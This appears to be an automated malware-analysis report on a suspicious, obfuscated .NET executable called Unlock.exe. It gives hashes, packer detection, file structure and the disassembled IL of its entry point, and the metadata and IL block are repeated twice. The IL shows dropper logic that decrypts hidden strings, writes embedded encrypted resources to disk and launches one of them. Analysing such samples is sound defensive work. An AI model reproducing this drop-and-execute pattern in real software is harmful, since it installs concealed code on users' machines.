Suspicious
Suspect

bca6d652a499554802b0cec68dafca10

PE Executable
|
MD5: bca6d652a499554802b0cec68dafca10
|
Size: 16.87 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

High

Hash
 Hash Value
MD5
bca6d652a499554802b0cec68dafca10
Sha1
fe328627b6a9000c4fe095e9ff26c2e7b85cdf75
Sha256
c82e00a5528e7cae35d7454562ab830a8de45b0b6a1150ec0907ebb0072842da
Sha384
e3dad0b91d4ba24a452a5f0cfce5e462c1cee491dc91b75b24889af5fab4223f2d04fa82855c519ec7da8a9b368c0818
Sha512
4f8e057f1945be4ac3d96d9195cce82f36a11861c0845de3fc7ee32f6be76c653ab08a465c5588ab1e9f55ce22cd48b68721d925f7202374788af8cd680c3f4f
SSDeep
393216:pnI6d3a2wi3lsIbEnj2YQcFea83NhtPUAJiOeXoQvH:+Gs9nj2/rR/JiOeXo
TLSH
A7073302B88E06F6A94C7F7544B6AE5B059D2A5F103311237BD8093971AB79CB393B7C

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
bca6d652a499554802b0cec68dafca10
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
kczdjpvzuvvstzec.Resources
awgxdlpquuujgwfr
frrbptrzspvyiaku
pllqulqzniipuktx
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Unlock.exe
Full Name

Unlock.exe
EntryPoint

System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Scope Name

Unlock.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Unlock
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

20
Main Method

System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Main IL Instruction Count

141
Main IL

ldstr SSf8OnE14MbVEZCw1AX4ZUNSNcnausjih5yuAxwqjjJyD16zBEsPxm3Z7b5GmSudSis4YpWqFrHGs5c2PctwixqTTnWZsmSY707KpUgf9OCvtZilLYCImuV/s2aW+HKAmLg55gyVsyvqeXu8ld4tCXLlWhnl7UjCsO8ylugQKi0Zujgg4Lo7ebClWAMwjiCxakNc0BPlKb10Do/LFnXJbyzDErl+BUJMjPeN5ofkzBXt76DPoBNUiMwS9VVhMv8AQMC56Z/PNllGUEq0LpOPV0LIw01sv9pOKnUmIiOGC6CBFKftpsCmVJT0brUbuhxX/rLDwLSzJ4QVxgcImjabYPyWOeOmuO7y1av95L7eqX+1rk0f6j27ubQiD9Hjt2LPfP5/uIuNjOSXrQG9YO5OTw== call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::ezuewxw(System.String) ldc.i4.3 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr Ovalz7NOF+eqaZPk8lPuUA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr awgxdlpquuujgwfr stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr PL2i738ohSZt28I6pihGZB4hW5ZOG8lYeCHLupHLBKk= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr frrbptrzspvyiaku stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 ldc.i4.2 <null> ldc.i4.4 <null> newarr System.String stloc.s V_7 ldloc.s V_7 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_7 ldc.i4.1 <null> ldstr F0kg0nyFuVb7NTbeTXoZu6Kg84pyiDFPGLg0ObmEVfk= stelem.ref <null> ldloc.s V_7 ldc.i4.2 <null> ldstr pllqulqzniipuktx stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr kczdjpvzuvvstzec call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_013C: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr TQ2t/T+oYKw3ATMu8jVeHzNVaa4uqCDjUINmt8ytSOI= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00E6: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00EB: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::bfzavgfglrykmk(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) ldstr DAN8PDaFWpUrLjJpJ5NUNA== call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0138: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> blt.s IL_00C4: ldloc.0 ret <null>
Module Name

Unlock.exe
Full Name

Unlock.exe
EntryPoint

System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Scope Name

Unlock.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Unlock
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

20
Main Method

System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Main IL Instruction Count

141
Main IL

ldstr SSf8OnE14MbVEZCw1AX4ZUNSNcnausjih5yuAxwqjjJyD16zBEsPxm3Z7b5GmSudSis4YpWqFrHGs5c2PctwixqTTnWZsmSY707KpUgf9OCvtZilLYCImuV/s2aW+HKAmLg55gyVsyvqeXu8ld4tCXLlWhnl7UjCsO8ylugQKi0Zujgg4Lo7ebClWAMwjiCxakNc0BPlKb10Do/LFnXJbyzDErl+BUJMjPeN5ofkzBXt76DPoBNUiMwS9VVhMv8AQMC56Z/PNllGUEq0LpOPV0LIw01sv9pOKnUmIiOGC6CBFKftpsCmVJT0brUbuhxX/rLDwLSzJ4QVxgcImjabYPyWOeOmuO7y1av95L7eqX+1rk0f6j27ubQiD9Hjt2LPfP5/uIuNjOSXrQG9YO5OTw== call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::ezuewxw(System.String) ldc.i4.3 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr Ovalz7NOF+eqaZPk8lPuUA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr awgxdlpquuujgwfr stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr PL2i738ohSZt28I6pihGZB4hW5ZOG8lYeCHLupHLBKk= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr frrbptrzspvyiaku stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 ldc.i4.2 <null> ldc.i4.4 <null> newarr System.String stloc.s V_7 ldloc.s V_7 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_7 ldc.i4.1 <null> ldstr F0kg0nyFuVb7NTbeTXoZu6Kg84pyiDFPGLg0ObmEVfk= stelem.ref <null> ldloc.s V_7 ldc.i4.2 <null> ldstr pllqulqzniipuktx stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr kczdjpvzuvvstzec call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_013C: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr TQ2t/T+oYKw3ATMu8jVeHzNVaa4uqCDjUINmt8ytSOI= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00E6: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00EB: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::bfzavgfglrykmk(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) ldstr DAN8PDaFWpUrLjJpJ5NUNA== call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0138: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> blt.s IL_00C4: ldloc.0 ret <null>
bca6d652a499554802b0cec68dafca10 (16.87 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙